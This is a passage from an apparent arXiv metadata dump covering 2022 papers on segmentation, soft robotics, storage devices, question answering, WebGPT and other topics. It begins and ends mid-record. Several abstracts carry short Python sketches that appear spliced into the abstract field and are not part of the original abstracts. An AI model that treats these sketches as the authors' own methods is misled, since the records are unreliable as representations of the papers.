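    return iter(np.linalg.norm(x - mu, axis=1).tolist())

scores = rdd.mapPartitions(score_partition).collect()
print(max(scores))
spark.stop()
```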
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 20:09:47 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Zhang",
"Sean",
""
],
[
"Ursekar",
"Varun",
""
],
[
"Akoglu",
"Leman",
""
]
] |
new_dataset
| 0.991837 |
2206.01309
|
Peixian Liang
|
Peixian Liang, Yizhe Zhang, Yifan Ding, Jianxu Chen, Chinedu S.
Madukoma, Tim Weninger, Joshua D. Shrout, Danny Z. Chen
|
H-EMD: A Hierarchical Earth Mover's Distance Method for Instance
Segmentation
|
Accepted at IEEE Transactions On Medical Imaging (TMI)
| null | null | null |
cs.CV
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
Deep learning (DL) based semantic segmentation methods have achieved
excellent performance in biomedical image segmentation, producing high quality
probability maps to allow extraction of rich instance information to facilitate
good instance segmentation. While numerous efforts have been put into
developing new DL semantic segmentation models, less attention has been paid to
the key issue of how
to effectively explore their probability maps to attain the best possible
instance segmentation. We observe that probability maps by DL semantic
segmentation models can be used to generate many possible instance candidates,
and accurate instance segmentation can be achieved by selecting from them a set
of "optimized" candidates as output instances. Further, the generated instance
candidates form a well-behaved hierarchical structure (a forest), which allows
selecting instances in an optimized manner. Hence, we propose a novel
framework, called hierarchical earth mover's distance (H-EMD), for instance
segmentation in biomedical 2D+time videos and 3D images, which judiciously
incorporates consistent instance selection with semantic-segmentation-generated
probability maps. H-EMD contains two main stages. (1) Instance candidate
generation: capturing instance-structured information in probability maps by
generating many instance candidates in a forest structure. (2) Instance
candidate selection: selecting instances from the candidate set for final
instance segmentation. We formulate a key instance selection problem on the
instance candidate forest as an optimization problem based on the earth mover's
distance (EMD), and solve it by integer linear programming. Extensive
experiments on eight biomedical video or 3D datasets demonstrate that H-EMD
consistently boosts DL semantic segmentation models and is highly competitive
with state-of-the-art methods.
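Stage one, generating a hierarchy of instance candidates from a probability map, can be sketched by labeling connected components at several thresholds; the EMD-based ILP selection of stage two is not reproduced here.

```python
# Sketch: multi-threshold instance candidate generation from a probability map.
import numpy as np
from scipy import ndimage

prob = np.zeros((64, 64))
prob[10:30, 10:30] = 0.9   # toy "cell" regions
prob[40:60, 35:55] = 0.6

candidates = []
for thr in (0.3, 0.5, 0.7):
    labeled, n = ndimage.label(prob > thr)          # connected components
    for i in range(1, n + 1):
        candidates.append((thr, np.argwhere(labeled == i)))

print(len(candidates), "candidates across thresholds")
```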
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 21:27:27 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Liang",
"Peixian",
""
],
[
"Zhang",
"Yizhe",
""
],
[
"Ding",
"Yifan",
""
],
[
"Chen",
"Jianxu",
""
],
[
"Madukoma",
"Chinedu S.",
""
],
[
"Weninger",
"Tim",
""
],
[
"Shrout",
"Joshua D.",
""
],
[
"Chen",
"Danny Z.",
""
]
] |
new_dataset
| 0.969251 |
2206.01339
|
Yon Visell
|
Mengjia Zhu, Adrian Ferstera, Stejara Dinulescu, Nikolas Kastor, Max
Linnander, Elliot W. Hawkes, Yon Visell
|
A peristaltic soft, wearable robot for compression and massage therapy
|
10 pages, 10 figures
| null | null | null |
cs.RO
|
http://creativecommons.org/licenses/by/4.0/
|
Soft robotics is attractive for wearable applications that require conformal
interactions with the human body. Soft wearable robotic garments hold promise
for supplying dynamic compression or massage therapies, such as those applied for
disorders affecting lymphatic and blood circulation. In this paper, we present
a wearable robot capable of supplying dynamic compression and massage therapy
via peristaltic motion of finger-sized soft, fluidic actuators. We show that
this peristaltic wearable robot can supply dynamic compression pressures
exceeding 22 kPa at frequencies of 14 Hz or more, meeting requirements for
compression and massage therapy. A large variety of software-programmable
compression wave patterns can be generated by varying frequency, amplitude,
phase delay, and duration parameters. We first demonstrate the utility of this
peristaltic wearable robot for compression therapy, showing fluid transport in
a laboratory model of the upper limb. We theoretically and empirically identify
driving regimes that optimize fluid transport. We second demonstrate the
utility of this garment for dynamic massage therapy. These findings show the
potential of such a wearable robot for the treatment of several health
disorders associated with lymphatic and blood circulation, such as lymphedema
and blood clots.
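The software-programmable wave patterns can be sketched as phase-delayed sinusoidal pressure commands; the amplitude, frequency, and phase step below are illustrative values chosen to echo the reported 22 kPa / 14 Hz figures.

```python
# Sketch: phase-delayed pressure commands forming a peristaltic wave
# across N finger-sized actuators.
import numpy as np

def peristaltic_commands(t: float, n_actuators: int = 6,
                         amp_kpa: float = 22.0, freq_hz: float = 14.0,
                         phase_step: float = np.pi / 3):
    phases = np.arange(n_actuators) * phase_step
    wave = 0.5 * (1 + np.sin(2 * np.pi * freq_hz * t - phases))
    return amp_kpa * wave  # per-actuator target pressure in kPa

print(np.round(peristaltic_commands(t=0.01), 2))
```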
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 23:40:11 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Zhu",
"Mengjia",
""
],
[
"Ferstera",
"Adrian",
""
],
[
"Dinulescu",
"Stejara",
""
],
[
"Kastor",
"Nikolas",
""
],
[
"Linnander",
"Max",
""
],
[
"Hawkes",
"Elliot W.",
""
],
[
"Visell",
"Yon",
""
]
] |
new_dataset
| 0.999242 |
2206.01365
|
Ivan Bajic
|
Victor A. Mateescu and Ivan V. Baji\'c
|
Adversarial Attacks on Human Vision
|
21 pages, 8 figures, 1 table
|
Extended version of IEEE MultiMedia, vol. 23, no. 1, pp. 82-91,
Jan.-Mar. 2016
|
10.1109/MMUL.2015.59
| null |
cs.CV eess.IV
|
http://creativecommons.org/licenses/by/4.0/
|
This article presents an introduction to visual attention retargeting, its
connection to visual saliency, the challenges associated with it, and ideas for
how it can be approached. The difficulty of attention retargeting as a saliency
inversion problem lies in the lack of one-to-one mapping between saliency and
the image domain, in addition to the possible negative impact of saliency
alterations on image aesthetics. A few approaches from recent literature to
solve this challenging problem are reviewed, and several suggestions for future
development are presented.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 02:05:04 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Mateescu",
"Victor A.",
""
],
[
"Bajić",
"Ivan V.",
""
]
] |
new_dataset
| 0.99796 |
2206.01381
|
Peng Li
|
Qiqi Ding, Peng Li, Xuefeng Yan, Ding Shi, Luming Liang, Weiming Wang,
Haoran Xie, Jonathan Li, Mingqiang Wei
|
CF-YOLO: Cross Fusion YOLO for Object Detection in Adverse Weather with
a High-quality Real Snow Dataset
|
10pages
| null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Snow is one of the toughest adverse weather conditions for object detection
(OD). Currently, not only is there a lack of snowy OD datasets to train
cutting-edge detectors, but these detectors also have difficulty learning
latent information beneficial for detection in snow. To alleviate the two above
problems, we first establish a real-world snowy OD dataset, named RSOD.
Besides, we develop an unsupervised training strategy with a distinctive
activation function, called $Peak \ Act$, to quantitatively evaluate the effect
of snow on each object. Peak Act helps grade the images in RSOD into four
difficulty levels. To our knowledge, RSOD is the first quantitatively
evaluated and graded snowy OD dataset. Then, we propose a novel Cross Fusion
(CF) block to construct a lightweight OD network based on YOLOv5s (call
CF-YOLO). CF is a plug-and-play feature aggregation module, which integrates
the advantages of Feature Pyramid Network and Path Aggregation Network in a
simpler yet more flexible form. Both RSOD and CF lead our CF-YOLO to possess an
optimization ability for OD in real-world snow. That is, CF-YOLO can handle
unfavorable detection problems of vagueness, distortion and covering of snow.
Experiments show that our CF-YOLO achieves better detection results on RSOD,
compared to SOTAs. The code and dataset are available at
https://github.com/qqding77/CF-YOLO-and-RSOD.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 04:00:26 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Ding",
"Qiqi",
""
],
[
"Li",
"Peng",
""
],
[
"Yan",
"Xuefeng",
""
],
[
"Shi",
"Ding",
""
],
[
"Liang",
"Luming",
""
],
[
"Wang",
"Weiming",
""
],
[
"Xie",
"Haoran",
""
],
[
"Li",
"Jonathan",
""
],
[
"Wei",
"Mingqiang",
""
]
] |
new_dataset
| 0.999843 |
2206.01547
|
Animesh Trivedi
|
Nick Tehrany and Animesh Trivedi
|
Understanding NVMe Zoned Namespace (ZNS) Flash SSD Storage Devices
| null | null | null | null |
cs.OS cs.PF
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
The standardization of NVMe Zoned Namespaces (ZNS) in the NVMe 2.0
specification presents a unique new addition to storage devices. Unlike
traditional SSDs, where the flash media management idiosyncrasies are hidden
behind a flash translation layer (FTL) inside the device, ZNS devices push
certain operations regarding data placement and garbage collection out from the
device to the host. This allows the host to achieve more optimal data placement
and predictable garbage collection overheads, along with lower device write
amplification. Thus, additionally increasing flash media lifetime. As a result,
ZNS devices are gaining significant attention in the research community.
However, with the current software stack there are numerous ways of
integrating ZNS devices into a host system. In this work, we begin to
systematically analyze the integration options, report on the current software
support for ZNS devices in the Linux Kernel, and provide an initial set of
performance measurements. Our main findings show that larger I/O sizes are
required to saturate the ZNS device bandwidth, and configuration of the I/O
scheduler can provide workload-dependent performance gains, requiring careful
consideration of ZNS integration and configuration depending on the application
workload and its access patterns. Our dataset and code are available at
https://github.com/nicktehrany/ZNS-Study.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 12:54:55 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Tehrany",
"Nick",
""
],
[
"Trivedi",
"Animesh",
""
]
] |
new_dataset
| 0.998767 |
2206.01550
|
Mohammed Elkomy Alaa
|
Mohammed ElKomy, Amany M. Sarhan
|
TCE at Qur'an QA 2022: Arabic Language Question Answering Over Holy
Qur'an Using a Post-Processed Ensemble of BERT-based Models
|
OSACT5 workshop, Qur'an QA 2022 Shared Task participation by TCE
| null | null | null |
cs.CL cs.IR
|
http://creativecommons.org/licenses/by/4.0/
|
In recent years, we witnessed great progress in different tasks of natural
language understanding using machine learning. Question answering is one of
these tasks which is used by search engines and social media platforms for
improved user experience. Arabic is the language of the Holy Qur'an, the sacred
text for 1.8 billion people across the world. Arabic is a challenging language
for Natural Language Processing (NLP) due to its complex structures. In this
article, we describe our attempts at the OSACT5 Qur'an QA 2022 Shared Task, which
is a question answering challenge on the Holy Qur'an in Arabic. We propose an
ensemble learning model based on Arabic variants of BERT models. In addition,
we perform post-processing to enhance the model predictions. Our system
achieves a Partial Reciprocal Rank (pRR) score of 56.6% on the official test
set.
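The ensembling idea can be sketched by averaging start/end logits across models and picking the best valid span; the shapes and the paper's post-processing details are assumptions.

```python
# Sketch: ensemble extractive QA by averaging span logits over models.
import numpy as np

def ensemble_span(start_logits_list, end_logits_list, max_len: int = 30):
    start = np.mean(start_logits_list, axis=0)   # average over ensemble members
    end = np.mean(end_logits_list, axis=0)
    best, span = -np.inf, (0, 0)
    for i in range(len(start)):
        for j in range(i, min(i + max_len, len(end))):
            if start[i] + end[j] > best:         # best valid (start, end) pair
                best, span = start[i] + end[j], (i, j)
    return span

rng = np.random.default_rng(0)
logits = [rng.normal(size=50) for _ in range(3)]  # 3 models, 50 tokens
print(ensemble_span(logits, logits))
```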
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 13:00:48 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"ElKomy",
"Mohammed",
""
],
[
"Sarhan",
"Amany M.",
""
]
] |
new_dataset
| 0.999597 |
2206.01683
|
WenJi Liu
|
Wenji Liu, Kai Bai, Xuming He, Shuran Song, Changxi Zheng, Xiaopei Liu
|
FishGym: A High-Performance Physics-based Simulation Framework for
Underwater Robot Learning
|
8 pages,8 figures
| null | null | null |
cs.RO
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Bionic underwater robots have demonstrated their superiority in many
applications. Yet, training their intelligence for a variety of tasks that
mimic the behavior of underwater creatures poses a number of challenges in
practice, mainly due to lack of a large amount of available training data as
well as the high cost in real physical environment. Alternatively, simulation
has been considered as a viable and important tool for acquiring datasets in
different environments, but it mostly targeted rigid and soft body systems.
There is currently a dearth of work on more complex fluid systems interacting
with immersed solids that can be efficiently and accurately simulated for robot
training purposes. In this paper, we propose a new platform called "FishGym",
which can be used to train fish-like underwater robots. The framework consists
of a robotic fish modeling module using articulated body with skinning, a
GPU-based high-performance localized two-way coupled fluid-structure
interaction simulation module that handles both finite and infinitely large
domains, as well as a reinforcement learning module. We leveraged existing
training methods with adaptations to underwater fish-like robots and obtained
learned control policies for multiple benchmark tasks. The training results are
demonstrated with reasonable motion trajectories, with comparisons and analyses
to empirical models as well as known real fish swimming behaviors to highlight
the advantages of the proposed platform.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 16:57:31 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Liu",
"Wenji",
""
],
[
"Bai",
"Kai",
""
],
[
"He",
"Xuming",
""
],
[
"Song",
"Shuran",
""
],
[
"Zheng",
"Changxi",
""
],
[
"Liu",
"Xiaopei",
""
]
] |
new_dataset
| 0.99886 |
2206.01718
|
Roozbeh Mottaghi
|
Dustin Schwenk, Apoorv Khandelwal, Christopher Clark, Kenneth Marino,
Roozbeh Mottaghi
|
A-OKVQA: A Benchmark for Visual Question Answering using World Knowledge
| null | null | null | null |
cs.CV cs.CL
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
The Visual Question Answering (VQA) task aspires to provide a meaningful
testbed for the development of AI models that can jointly reason over visual
and natural language inputs. Despite a proliferation of VQA datasets, this goal
is hindered by a set of common limitations. These include a reliance on
relatively simplistic questions that are repetitive in both concepts and
linguistic structure, little world knowledge needed outside of the paired
image, and limited reasoning required to arrive at the correct answer. We
introduce A-OKVQA, a crowdsourced dataset composed of a diverse set of about
25K questions requiring a broad base of commonsense and world knowledge to
answer. In contrast to the existing knowledge-based VQA datasets, the questions
generally cannot be answered by simply querying a knowledge base, and instead
require some form of commonsense reasoning about the scene depicted in the
image. We demonstrate the potential of this new dataset through a detailed
analysis of its contents and baseline performance measurements over a variety
of state-of-the-art vision-language models. Project page:
http://a-okvqa.allenai.org/
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 17:52:27 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Schwenk",
"Dustin",
""
],
[
"Khandelwal",
"Apoorv",
""
],
[
"Clark",
"Christopher",
""
],
[
"Marino",
"Kenneth",
""
],
[
"Mottaghi",
"Roozbeh",
""
]
] |
new_dataset
| 0.999448 |
2101.02120
|
Dennis Soemers
|
\'Eric Piette, Cameron Browne and Dennis J. N. J. Soemers
|
Ludii Game Logic Guide
| null | null | null | null |
cs.AI
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
This technical report outlines the fundamental workings of the game logic
behind Ludii, a general game system, that can be used to play a wide variety of
games. Ludii is a program developed for the ERC-funded Digital Ludeme Project,
in which mathematical and computational approaches are used to study how games
were played, and spread, throughout history. This report explains how general
game states and equipment are represented in Ludii, and how the rule ludemes
dictating play are implemented behind the scenes, giving some insight into the
core game logic behind the Ludii general game player. This guide is intended to
help game designers using the Ludii game description language to understand it
more completely and make fuller use of its features when describing their
games.
|
[
{
"version": "v1",
"created": "Wed, 6 Jan 2021 16:22:37 GMT"
},
{
"version": "v2",
"created": "Thu, 2 Jun 2022 13:06:50 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Piette",
"Éric",
""
],
[
"Browne",
"Cameron",
""
],
[
"Soemers",
"Dennis J. N. J.",
""
]
] |
new_dataset
| 0.999765 |
2112.09332
|
Jacob Hilton
|
Reiichiro Nakano, Jacob Hilton, Suchir Balaji, Jeff Wu, Long Ouyang,
Christina Kim, Christopher Hesse, Shantanu Jain, Vineet Kosaraju, William
Saunders, Xu Jiang, Karl Cobbe, Tyna Eloundou, Gretchen Krueger, Kevin
Button, Matthew Knight, Benjamin Chess, John Schulman
|
WebGPT: Browser-assisted question-answering with human feedback
|
32 pages
| null | null | null |
cs.CL cs.AI cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We fine-tune GPT-3 to answer long-form questions using a text-based
web-browsing environment, which allows the model to search and navigate the
web. By setting up the task so that it can be performed by humans, we are able
to train models on the task using imitation learning, and then optimize answer
quality with human feedback. To make human evaluation of factual accuracy
easier, models must collect references while browsing in support of their
answers. We train and evaluate our models on ELI5, a dataset of questions asked
by Reddit users. Our best model is obtained by fine-tuning GPT-3 using behavior
cloning, and then performing rejection sampling against a reward model trained
to predict human preferences. This model's answers are preferred by humans 56%
of the time to those of our human demonstrators, and 69% of the time to the
highest-voted answer from Reddit.
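The rejection-sampling step can be sketched as best-of-n selection against a reward model; `generate` and `reward` below are stand-in callables, not the actual models.

```python
# Sketch: best-of-n rejection sampling against a reward model.
import random

def generate(question: str) -> str:               # stand-in policy sample
    return f"answer-{random.random():.3f}"

def reward(question: str, answer: str) -> float:  # stand-in reward model
    return random.random()

def best_of_n(question: str, n: int = 16) -> str:
    candidates = [generate(question) for _ in range(n)]
    return max(candidates, key=lambda a: reward(question, a))

print(best_of_n("Why is the sky blue?"))
```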
|
[
{
"version": "v1",
"created": "Fri, 17 Dec 2021 05:43:43 GMT"
},
{
"version": "v2",
"created": "Sat, 12 Mar 2022 22:49:16 GMT"
},
{
"version": "v3",
"created": "Wed, 1 Jun 2022 19:08:11 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Nakano",
"Reiichiro",
""
],
[
"Hilton",
"Jacob",
""
],
[
"Balaji",
"Suchir",
""
],
[
"Wu",
"Jeff",
""
],
[
"Ouyang",
"Long",
""
],
[
"Kim",
"Christina",
""
],
[
"Hesse",
"Christopher",
""
],
[
"Jain",
"Shantanu",
""
],
[
"Kosaraju",
"Vineet",
""
],
[
"Saunders",
"William",
""
],
[
"Jiang",
"Xu",
""
],
[
"Cobbe",
"Karl",
""
],
[
"Eloundou",
"Tyna",
""
],
[
"Krueger",
"Gretchen",
""
],
[
"Button",
"Kevin",
""
],
[
"Knight",
"Matthew",
""
],
[
"Chess",
"Benjamin",
""
],
[
"Schulman",
"John",
""
]
] |
new_dataset
| 0.966531 |
2112.13985
|
Shoya Matsumori
|
Shoya Matsumori, Yuki Abe, Kosuke Shingyouchi, Komei Sugiura, and
Michita Imai
|
LatteGAN: Visually Guided Language Attention for Multi-Turn
Text-Conditioned Image Manipulation
| null |
IEEE Access, 9, 160521-160532 (2021)
|
10.1109/ACCESS.2021.3129215
| null |
cs.CV
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Text-guided image manipulation tasks have recently gained attention in the
vision-and-language community. While most of the prior studies focused on
single-turn manipulation, our goal in this paper is to address the more
challenging multi-turn image manipulation (MTIM) task. Previous models for this
task successfully generate images iteratively, given a sequence of instructions
and a previously generated image. However, this approach suffers from
under-generation and from low quality of the generated objects that are
described in the instructions, which consequently degrades the overall
performance. To overcome these problems, we present a novel architecture called
a Visually Guided Language Attention GAN (LatteGAN). Here, we address the
limitations of the previous approaches by introducing a Visually Guided
Language Attention (Latte) module, which extracts fine-grained text
representations for the generator, and a Text-Conditioned U-Net discriminator
architecture, which discriminates both the global and local representations of
fake or real images. Extensive experiments on two distinct MTIM datasets,
CoDraw and i-CLEVR, demonstrate the state-of-the-art performance of the
proposed model.
|
[
{
"version": "v1",
"created": "Tue, 28 Dec 2021 03:50:03 GMT"
},
{
"version": "v2",
"created": "Thu, 2 Jun 2022 10:14:38 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Matsumori",
"Shoya",
""
],
[
"Abe",
"Yuki",
""
],
[
"Shingyouchi",
"Kosuke",
""
],
[
"Sugiura",
"Komei",
""
],
[
"Imai",
"Michita",
""
]
] |
new_dataset
| 0.998837 |
2204.05009
|
Beno\^it Denkinger
|
Beno\^it Walter Denkinger, Miguel Pe\'on-Quir\'os, Mario Konijnenburg,
David Atienza, Francky Catthoor
|
VWR2A: A Very-Wide-Register Reconfigurable-Array Architecture for
Low-Power Embedded Devices
| null | null | null | null |
cs.AR
|
http://creativecommons.org/licenses/by/4.0/
|
Edge-computing requires high-performance energy-efficient embedded systems.
Fixed-function or custom accelerators, such as FFT or FIR filter engines, are
very efficient at implementing a particular functionality for a given set of
constraints. However, they are inflexible when facing application-wide
optimizations or functionality upgrades. Conversely, programmable cores offer
higher flexibility, but often with a penalty in area, performance, and, above
all, energy consumption. In this paper, we propose VWR2A, an architecture that
integrates high computational density and low power memory structures (i.e.,
very-wide registers and scratchpad memories). VWR2A narrows the energy gap with
similar or better performance on FFT kernels with respect to an FFT
accelerator. Moreover, VWR2A's flexibility allows it to accelerate multiple kernels,
resulting in significant energy savings at the application level.
|
[
{
"version": "v1",
"created": "Mon, 11 Apr 2022 11:15:36 GMT"
},
{
"version": "v2",
"created": "Thu, 14 Apr 2022 12:35:32 GMT"
},
{
"version": "v3",
"created": "Thu, 2 Jun 2022 07:16:13 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Denkinger",
"Benoît Walter",
""
],
[
"Peón-Quirós",
"Miguel",
""
],
[
"Konijnenburg",
"Mario",
""
],
[
"Atienza",
"David",
""
],
[
"Catthoor",
"Francky",
""
]
] |
new_dataset
| 0.999655 |
2206.00777
|
Luca Carlone
|
Luca Carlone, Kasra Khosoussi, Vasileios Tzoumas, Golnaz Habibi,
Markus Ryll, Rajat Talak, Jingnan Shi, Pasquale Antonante
|
Visual Navigation for Autonomous Vehicles: An Open-source Hands-on
Robotics Course at MIT
|
This paper has been accepted for publication at the IEEE Integrated
STEM Education Conference
| null | null | null |
cs.RO
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
This paper reports on the development, execution, and open-sourcing of a new
robotics course at MIT. The course is a modern take on "Visual Navigation for
Autonomous Vehicles" (VNAV) and targets first-year graduate students and senior
undergraduates with prior exposure to robotics. VNAV has the goal of preparing
the students to perform research in robotics and vision-based navigation, with
emphasis on drones and self-driving cars. The course spans the entire
autonomous navigation pipeline; as such, it covers a broad set of topics,
including geometric control and trajectory optimization, 2D and 3D computer
vision, visual and visual-inertial odometry, place recognition, simultaneous
localization and mapping, and geometric deep learning for perception. VNAV has
three key features. First, it bridges traditional computer vision and robotics
courses by exposing the challenges that are specific to embodied intelligence,
e.g., limited computation and need for just-in-time and robust perception to
close the loop over control and decision making. Second, it strikes a balance
between depth and breadth by combining rigorous technical notes (including
topics that are less explored in typical robotics courses, e.g., on-manifold
optimization) with slides and videos showcasing the latest research results.
Third, it provides a compelling approach to hands-on robotics education by
leveraging a physical drone platform (mostly suitable for small residential
courses) and a photo-realistic Unity-based simulator (open-source and scalable
to large online courses). VNAV has been offered at MIT in the Falls of
2018-2021 and is now publicly available on MIT OpenCourseWare (OCW).
|
[
{
"version": "v1",
"created": "Wed, 1 Jun 2022 21:40:35 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Carlone",
"Luca",
""
],
[
"Khosoussi",
"Kasra",
""
],
[
"Tzoumas",
"Vasileios",
""
],
[
"Habibi",
"Golnaz",
""
],
[
"Ryll",
"Markus",
""
],
[
"Talak",
"Rajat",
""
],
[
"Shi",
"Jingnan",
""
],
[
"Antonante",
"Pasquale",
""
]
] |
new_dataset
| 0.971746 |
2206.00800
|
Li Niu
|
Haoxu Huang, Li Niu
|
CcHarmony: Color-checker based Image Harmonization Dataset
| null | null | null | null |
cs.CV
|
http://creativecommons.org/publicdomain/zero/1.0/
|
Image harmonization aims to adjust the foreground in a composite image
to make it compatible with the background, producing a more realistic and
harmonious image. Training a deep image harmonization network requires abundant
training data, but it is extremely difficult to acquire training pairs of
composite images and ground-truth harmonious images. Therefore, existing works
turn to adjust the foreground appearance in a real image to create a synthetic
composite image. However, such adjustment may not faithfully reflect the
natural illumination change of foreground. In this work, we explore a novel
transitive way to construct image harmonization dataset. Specifically, based on
the existing datasets with recorded illumination information, we first convert
the foreground in a real image to the standard illumination condition, and then
convert it to another illumination condition, which is combined with the
original background to form a synthetic composite image. In this manner, we
construct an image harmonization dataset called ccHarmony, which is named after
color checker (cc). The dataset is available at
https://github.com/bcmi/Image-Harmonization-Dataset-ccHarmony.
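The transitive illumination conversion can be sketched as two diagonal (von Kries-style) scalings, source illuminant to standard and standard to target; the RGB gains below are toy values, not the dataset's recorded measurements.

```python
# Sketch: two-step illuminant transfer via per-channel diagonal scaling.
import numpy as np

def reilluminate(fg: np.ndarray, illum_src, illum_std, illum_dst):
    to_std = np.asarray(illum_std) / np.asarray(illum_src)   # src -> standard
    to_dst = np.asarray(illum_dst) / np.asarray(illum_std)   # standard -> target
    return np.clip(fg * to_std * to_dst, 0.0, 1.0)

fg = np.random.rand(8, 8, 3)                                 # toy foreground
out = reilluminate(fg, illum_src=(1.0, 0.9, 0.7),
                   illum_std=(1.0, 1.0, 1.0), illum_dst=(0.7, 0.8, 1.1))
print(out.shape)
```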
|
[
{
"version": "v1",
"created": "Wed, 1 Jun 2022 23:57:16 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Huang",
"Haoxu",
""
],
[
"Niu",
"Li",
""
]
] |
new_dataset
| 0.990252 |
2206.00827
|
Bin Li
|
Bin Li, Jiaqi Gu and Huazi Zhang
|
Universal Polar Coding for Parallel Gaussian Channels with Non-Binary
Inputs and Its Applications to HARQ and MIMO
| null | null | null | null |
cs.IT math.IT
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
In this paper, we first propose a universal polar coding scheme for parallel
Gaussian channels with non-binary inputs. It is assumed that the encoder knows
only the sum capacity of the M parallel channels instead of the capacity of any
single channel. By decomposing each parallel channel into $T = \lceil \log_2 r
\rceil$ binary sub-channels, we obtain $MT$ binary sub-channels in total. A
super polar coding scheme that codes across all sub-channels is then proposed.
This scheme can achieve
the sum capacity when the block length is sufficiently large. We have also
discussed the applications of parallel polar coding design for both the HARQ
and MIMO systems. It is shown that a capacity-achieving HARQ scheme can be
obtained for block fading channel and a capacity-achieving MIMO design that
requires only the feedback of the sum rate of all MIMO layers can also be
attained.
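The decomposition count is easy to make concrete; the sketch below only computes the number of binary sub-channels (assuming the bracketed quantity in the abstract denotes a ceiling), not the polar code construction itself.

```python
# Sketch: number of binary sub-channels after decomposing M parallel
# channels with r-ary inputs into T = ceil(log2 r) sub-channels each.
import math

def num_binary_subchannels(M: int, r: int) -> int:
    T = math.ceil(math.log2(r))
    return M * T

print(num_binary_subchannels(M=4, r=16))  # 4 channels, 16-ary input -> 16
```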
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 01:55:28 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Li",
"Bin",
""
],
[
"Gu",
"Jiaqi",
""
],
[
"Zhang",
"Huazi",
""
]
] |
new_dataset
| 0.98546 |
2206.00847
|
Sajad Sotudeh
|
Sajad Sotudeh, Nazli Goharian
|
TSTR: Too Short to Represent, Summarize with Details! Intro-Guided
Extended Summary Generation
|
9 pages, NAACL 2022 Long Paper
| null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by/4.0/
|
Many scientific papers, such as those in the arXiv and PubMed collections,
have abstracts of varying lengths (50-1000 words), with an average length of
approximately 200 words, where longer abstracts typically convey more
information about the source paper. Until recently, scientific summarization
research typically focused on generating short, abstract-like summaries,
following the existing datasets used for scientific summarization. In domains
where the source text is relatively long-form, such as scientific documents,
such a summary cannot go beyond a general, coarse overview to
provide salient information from the source document. Recent interest in
tackling this problem motivated the curation of the scientific datasets arXiv-Long
and PubMed-Long, containing human-written summaries of 400-600 words, hence
providing a venue for research on generating long/extended summaries. Extended
summaries facilitate a faster read while providing details beyond coarse
information. In this paper, we propose TSTR, an extractive summarizer that
utilizes the introductory information of documents as pointers to their salient
information. Evaluations on two existing large-scale extended summarization
datasets indicate statistically significant improvements in Rouge and
average Rouge (F1) scores (except in one case) compared to strong baselines
and the state of the art. Comprehensive human evaluations favor our generated
extended summaries in terms of cohesion and completeness.
|
[
{
"version": "v1",
"created": "Thu, 2 Jun 2022 02:45:31 GMT"
}
] | 2022-06-03T00:00:00 |
[
[
"Sotudeh",
"Sajad",
""
],
[
"Goharian",
"Nazli",
""
]
] |
new_dataset
| 0.998568 |
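
One way to picture the intro-guided extraction idea from the TSTR abstract above is the following hedged sketch, which scores body sentences by their TF-IDF cosine similarity to the introduction; the scoring function, parameter `k`, and names are assumptions for illustration, not the paper's trained model.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

def intro_guided_extract(intro_sentences, body_sentences, k=15):
    """Score each body sentence by its maximum TF-IDF cosine similarity to any
    introduction sentence, then return the top-k in original document order."""
    vec = TfidfVectorizer(stop_words="english")
    matrix = vec.fit_transform(intro_sentences + body_sentences)
    intro_vecs = matrix[: len(intro_sentences)]
    body_vecs = matrix[len(intro_sentences):]
    scores = cosine_similarity(body_vecs, intro_vecs).max(axis=1)
    top = sorted(range(len(body_sentences)), key=lambda i: scores[i], reverse=True)[:k]
    return [body_sentences[i] for i in sorted(top)]  # restore document order
```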
2206.00906
|
Aleksandr Nesterov
|
Aleksandr Nesterov, Bulat Ibragimov, Dmitriy Umerenkov, Artem
Shelmanov, Galina Zubkova and Vladimir Kokh
|
NeuralSympCheck: A Symptom Checking and Disease Diagnostic Neural Model
with Logic Regularization
|
Published in the proceedings of the conference "Artificial
Intelligence in Medicine 2022"
| null | null | null |
cs.CL cs.AI cs.HC cs.NE
|
http://creativecommons.org/licenses/by/4.0/
|
Symptom checking systems inquire about users' symptoms and perform a
rapid and affordable medical assessment of their condition. Basic symptom
checking systems based on Bayesian methods, decision trees, or information-gain
methods are easy to train and do not require significant computational
resources. However, their drawbacks are the low relevance of proposed symptoms
and insufficient diagnostic quality. The best results on these tasks are
achieved by reinforcement learning models. Their weaknesses are the difficulty
of developing and training such systems and limited applicability to cases with
large and sparse decision spaces. We propose a new approach based on the
